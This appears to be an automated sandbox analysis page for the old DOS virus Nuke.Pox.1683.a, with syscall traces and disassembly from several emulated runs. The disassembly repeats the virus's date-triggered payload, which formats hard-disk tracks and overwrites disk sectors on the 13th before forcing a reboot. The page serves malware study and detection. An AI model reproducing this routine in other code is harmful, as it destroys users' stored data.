Sample viewer

vx.netlux.org/Virus.DOS.Nuke.Pox.1683.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:46.359989694Z 42 PC: 12a57 | Get date 0x12a57: cmp dl, 0xd
0x12a5a: je 0x12a5e
0x12a5c: jmp 0x12a80
0x12a5e: mov ch, 0
0x12a60: mov ah, 5
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: int 0x13
0x12a68: inc ch
0x12a6a: jb 0x12a71
0x12a6c: cmp ch, 0x10
0x12a6f: loopne 0x12a60
0x12a71: mov al, 2
0x12a73: mov cx, 0x20
0x12a76: mov dx, 0
0x12a79: int 0x26
0x12a7b: ljmp 0xffff:0xfff0
0x12a80: mov ax, 0xabdc
0x12a83: int 0x21
0x12a85: cmp bx, 0xabdc
2018-12-17T22:54:46.36638812Z 171 PC: 12a85 | UNKNOWN!
2018-12-17T22:54:46.369101284Z 53 PC: 12a94 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:54:46.371497903Z 74 PC: 12abb | Reallocate memory
2018-12-17T22:54:46.375694958Z 72 PC: 12ac4 | Allocate memory
2018-12-17T22:54:46.379429393Z 37 PC: 12aef | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:54:46.395343841Z 76 PC: 0 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11674,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:08.792045302Z 42 PC: 12a57 | Get date 0x12a57: cmp dl, 0xd
0x12a5a: je 0x12a5e
0x12a5c: jmp 0x12a80
0x12a5e: mov ch, 0
0x12a60: mov ah, 5
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: int 0x13
0x12a68: inc ch
0x12a6a: jb 0x12a71
0x12a6c: cmp ch, 0x10
0x12a6f: loopne 0x12a60
0x12a71: mov al, 2
0x12a73: mov cx, 0x20
0x12a76: mov dx, 0
0x12a79: int 0x26
0x12a7b: ljmp 0xffff:0xfff0
0x12a80: mov ax, 0xabdc
0x12a83: int 0x21
0x12a85: cmp bx, 0xabdc

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11674,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:09.494205158Z 42 PC: 12a57 | Get date 0x12a57: cmp dl, 0xd
0x12a5a: je 0x12a5e
0x12a5c: jmp 0x12a80
0x12a5e: mov ch, 0
0x12a60: mov ah, 5
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: int 0x13
0x12a68: inc ch
0x12a6a: jb 0x12a71
0x12a6c: cmp ch, 0x10
0x12a6f: loopne 0x12a60
0x12a71: mov al, 2
0x12a73: mov cx, 0x20
0x12a76: mov dx, 0
0x12a79: int 0x26
0x12a7b: ljmp 0xffff:0xfff0
0x12a80: mov ax, 0xabdc
0x12a83: int 0x21
0x12a85: cmp bx, 0xabdc
2018-12-25T12:31:09.496581228Z 171 PC: 12a85 | UNKNOWN!
2018-12-25T12:31:09.497533245Z 53 PC: 12a94 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:31:09.498507456Z 74 PC: 12abb | Reallocate memory
2018-12-25T12:31:09.499865268Z 72 PC: 12ac4 | Allocate memory
2018-12-25T12:31:09.501115726Z 37 PC: 12aef | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:31:09.505146482Z 76 PC: 0 | Terminate with return code (Return code = '0')